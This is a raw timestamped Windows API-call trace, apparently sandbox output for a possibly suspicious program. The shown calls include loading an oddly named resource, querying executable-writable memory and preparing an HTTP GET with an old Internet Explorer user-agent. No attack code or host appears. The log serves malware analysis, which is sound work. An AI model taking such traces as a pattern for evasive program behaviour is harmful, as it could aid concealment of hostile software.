[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dfc0*="WRITE_DAC") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a2dfb0*="KEY_SET_VALUE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a2dfa0*="KEY_CREATE_LINK") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a2df90*="KEY_CREATE_SUB_KEY") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a2df80*="KEY_NOTIFY") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a2df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a2df60*="KEY_QUERY_VALUE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2df40*="STANDARD_RIGHTS_WRITE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a2df30*="STANDARD_RIGHTS_READ 2") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a2df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2df10*="DELETE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2df00*="READ_CONTROL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2def0*="WRITE_OWNER") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dee0*="WRITE_DAC") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a2ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a2dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a2deb0*="DESKTOP_JOURNALRECORD") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a2dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a2de90*="DESKTOP_HOOKCONTROL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a2de80*="DESKTOP_CREATEWINDOW") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a2de70*="DESKTOP_CREATEMENU") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a2de60*="DESKTOP_READOBJECTS") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a2de50*="DESKTOP_ENUMERATE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2de30*="STANDARD_RIGHTS_WRITE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2de20*="STANDARD_RIGHTS_READ") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2de10*="STANDARD_RIGHTS_ALL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2de00*="DELETE") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ddf0*="READ_CONTROL") returned 1
[0202.054] SysReAllocStringLen (in: pbstr=0x2a2dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dde0*="WRITE_OWNER") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ddd0*="WRITE_DAC") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a2ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a2ddb0*="WINSTA_READSCREEN") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a2dda0*="WINSTA_READATTRIBUTES") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a2dd90*="WINSTA_EXITWINDOWS") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a2dd80*="WINSTA_ENUMERATE") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a2dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a2dd60*="WINSTA_CREATEDESKTOP") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a2dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a2dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2dd10*="STANDARD_RIGHTS_READ") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a2dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dcf0*="READ_CONTROL") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a2dce0*="SI_ACCESS_SPECIFIC") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dcd0*="WRITE_DAC") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a2dcc0*="FILE_DELETE") returned 1
[0202.055] SysReAllocStringLen (in: pbstr=0x2a2dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a2dcb0*="FILE_DELETE_CHILD") returned 1
[0202.057] SetClassLongA (hWnd=0x1501e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0202.057] GetSystemMenu (hWnd=0x1501e8, bRevert=0) returned 0x1101e3
[0202.057] DeleteMenu (hMenu=0x1101e3, uPosition=0xf030, uFlags=0x0) returned 1
[0202.057] DeleteMenu (hMenu=0x1101e3, uPosition=0xf000, uFlags=0x0) returned 1
[0202.057] DeleteMenu (hMenu=0x1101e3, uPosition=0xf010, uFlags=0x0) returned 1
[0202.057] GetCurrentThreadId () returned 0x8d8
[0202.057] ResetEvent (hEvent=0xa0) returned 1
[0202.057] GetCurrentThreadId () returned 0x8d8
[0202.057] GetCurrentThreadId () returned 0x8d8
[0202.057] GetCurrentThreadId () returned 0x8d8
[0202.057] ResetEvent (hEvent=0xa0) returned 1
[0202.058] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f47c, fWinIni=0x0 | out: pvParam=0x10f47c) returned 1
[0202.058] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f47c, fWinIni=0x0 | out: pvParam=0x10f47c) returned 1
[0202.058] GetSystemMetrics (nIndex=49) returned 16
[0202.058] GetSystemMetrics (nIndex=50) returned 16
[0202.058] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f4c4, fWinIni=0x0 | out: pvParam=0x10f4c4) returned 1
[0202.058] IsWindowVisible (hWnd=0x1501e8) returned 0
[0202.058] GetCurrentThreadId () returned 0x8d8
[0202.058] VirtualQuery (in: lpAddress=0x2a01668, lpBuffer=0x10f394, dwLength=0x1c | out: lpBuffer=0x10f394*(BaseAddress=0x2a01000, AllocationBase=0x2940000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0202.058] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0202.059] FindResourceA (hModule=0x2940000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a48990
[0202.059] LoadResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0x2a4f044
[0202.059] SizeofResource (hModule=0x2940000, hResInfo=0x2a48990) returned 0xca5
[0202.059] LockResource (hResData=0x2a4f044) returned 0x2a4f044
[0202.059] GetCurrentThreadId () returned 0x8d8
[0202.059] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f148, fWinIni=0x0 | out: pvParam=0x10f148) returned 1
[0202.059] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f148, fWinIni=0x0 | out: pvParam=0x10f148) returned 1
[0202.059] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f148, fWinIni=0x0 | out: pvParam=0x10f148) returned 1
[0202.059] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x10f148, fWinIni=0x0 | out: pvParam=0x10f148) returned 1
[0202.060] GetDC (hWnd=0x0) returned 0x56010821
[0202.060] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.060] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0202.061] CreateFontIndirectA (lplf=0x10f0e4) returned 0x990a085b
[0202.061] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.061] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.061] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.061] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.061] GetSystemMetrics (nIndex=6) returned 1
[0202.062] VirtualAlloc (lpAddress=0x2a64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a64000
[0202.062] GetDC (hWnd=0x0) returned 0x56010821
[0202.062] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.062] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.062] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.062] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.062] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.062] GetSystemMetrics (nIndex=6) returned 1
[0202.063] GetDC (hWnd=0x0) returned 0x56010821
[0202.063] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.063] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.063] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.063] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.063] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.063] GetSystemMetrics (nIndex=6) returned 1
[0202.063] GetDC (hWnd=0x0) returned 0x56010821
[0202.063] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.063] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.063] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.063] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.063] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.063] GetSystemMetrics (nIndex=6) returned 1
[0202.063] GetDC (hWnd=0x0) returned 0x56010821
[0202.063] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.064] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.064] GetSystemMetrics (nIndex=6) returned 1
[0202.064] GetDC (hWnd=0x0) returned 0x56010821
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.064] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.064] GetSystemMetrics (nIndex=6) returned 1
[0202.064] GetDC (hWnd=0x0) returned 0x56010821
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.064] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.064] GetSystemMetrics (nIndex=6) returned 1
[0202.064] GetDC (hWnd=0x0) returned 0x56010821
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.064] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.064] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.065] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.065] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.065] GetSystemMetrics (nIndex=6) returned 1
[0202.065] GetDC (hWnd=0x0) returned 0x56010821
[0202.065] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.065] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.065] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.065] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.065] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.065] GetSystemMetrics (nIndex=6) returned 1
[0202.065] GetDC (hWnd=0x0) returned 0x56010821
[0202.065] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.065] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.065] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.065] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.065] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.065] GetSystemMetrics (nIndex=6) returned 1
[0202.065] GetDC (hWnd=0x0) returned 0x56010821
[0202.066] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.066] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.066] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.066] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.066] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.066] GetSystemMetrics (nIndex=6) returned 1
[0202.066] GetDC (hWnd=0x0) returned 0x56010821
[0202.066] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.066] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.066] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.066] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.066] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.066] GetSystemMetrics (nIndex=6) returned 1
[0202.066] GetDC (hWnd=0x0) returned 0x56010821
[0202.066] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.066] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.067] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.067] GetSystemMetrics (nIndex=6) returned 1
[0202.067] GetDC (hWnd=0x0) returned 0x56010821
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.067] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.067] GetSystemMetrics (nIndex=6) returned 1
[0202.067] GetDC (hWnd=0x0) returned 0x56010821
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.067] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.067] GetSystemMetrics (nIndex=6) returned 1
[0202.067] GetDC (hWnd=0x0) returned 0x56010821
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.067] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.067] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.067] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.067] GetSystemMetrics (nIndex=6) returned 1
[0202.068] GetDC (hWnd=0x0) returned 0x56010821
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.068] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.068] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.068] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.068] GetSystemMetrics (nIndex=6) returned 1
[0202.068] GetDC (hWnd=0x0) returned 0x56010821
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.068] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.068] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.068] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.068] GetSystemMetrics (nIndex=6) returned 1
[0202.068] GetDC (hWnd=0x0) returned 0x56010821
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f140 | out: lptm=0x10f140) returned 1
[0202.068] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.068] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f178 | out: lptm=0x10f178) returned 1
[0202.069] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.069] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.069] GetSystemMetrics (nIndex=6) returned 1
[0202.069] GetDC (hWnd=0x0) returned 0x56010821
[0202.069] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee44 | out: lptm=0x10ee44) returned 1
[0202.069] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.069] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10ee7c | out: lptm=0x10ee7c) returned 1
[0202.069] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.069] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.069] GetSystemMetrics (nIndex=6) returned 1
[0202.069] GetDC (hWnd=0x0) returned 0x56010821
[0202.069] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f12c | out: lptm=0x10f12c) returned 1
[0202.069] SelectObject (hdc=0x56010821, h=0x990a085b) returned 0x18a002e
[0202.069] GetTextMetricsA (in: hdc=0x56010821, lptm=0x10f164 | out: lptm=0x10f164) returned 1
[0202.069] SelectObject (hdc=0x56010821, h=0x18a002e) returned 0x990a085b
[0202.069] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0202.069] GetSystemMetrics (nIndex=6) returned 1
[0202.071] SysReAllocStringLen (in: pbstr=0x2a6f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0202.071] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.071] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.071] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.071] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0202.071] SysReAllocStringLen (in: pbstr=0x2a6f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a6f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0202.071] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x10f1c8, lpdwBufferLength=0x10f1cc | out: lpBuffer=0x10f1c8, lpdwBufferLength=0x10f1cc) returned 1
[0202.114] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x10f1c8, dwBufferLength=0x4) returned 1
[0202.114] VirtualFree (lpAddress=0x2a70000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0202.114] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a66490, cbMultiByte=3, lpWideCharStr=0x10e100, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0202.115] SysReAllocStringLen (in: pbstr=0x2a6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a6f388*="GET") returned 1
[0202.120] GetTextExtentPoint32A (in: hdc=0x56010821, lpString="0", c=1, psizl=0x10f2bc | out: psizl=0x10f2bc) returned 1
[0202.120] IsIconic (hWnd=0x1601a8) returned 0
[0202.120] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f2bc | out: lpRect=0x10f2bc) returned 1
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] IsIconic (hWnd=0x1601a8) returned 0
[0202.120] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f204 | out: lpRect=0x10f204) returned 1
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] IsIconic (hWnd=0x1601a8) returned 0
[0202.120] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.120] IsIconic (hWnd=0x1601a8) returned 0
[0202.120] GetClientRect (in: hWnd=0x1601a8, lpRect=0x10f1d4 | out: lpRect=0x10f1d4) returned 1
[0202.120] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0202.121] GetSysColor (nIndex=20) returned 0xffffff
[0202.121] FlatSB_SetScrollProp (param_1=0x1601a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0202.121] FlatSB_SetScrollInfo (param_1=0x1601a8, code=0, psi=0x10f212, fRedraw=1) returned 0
[0202.121] GetWindowLongA (hWnd=0x1601a8, nIndex=-16) returned 116326400
[0202.121] IsIconic (hWnd=0x1601a8) returned 0
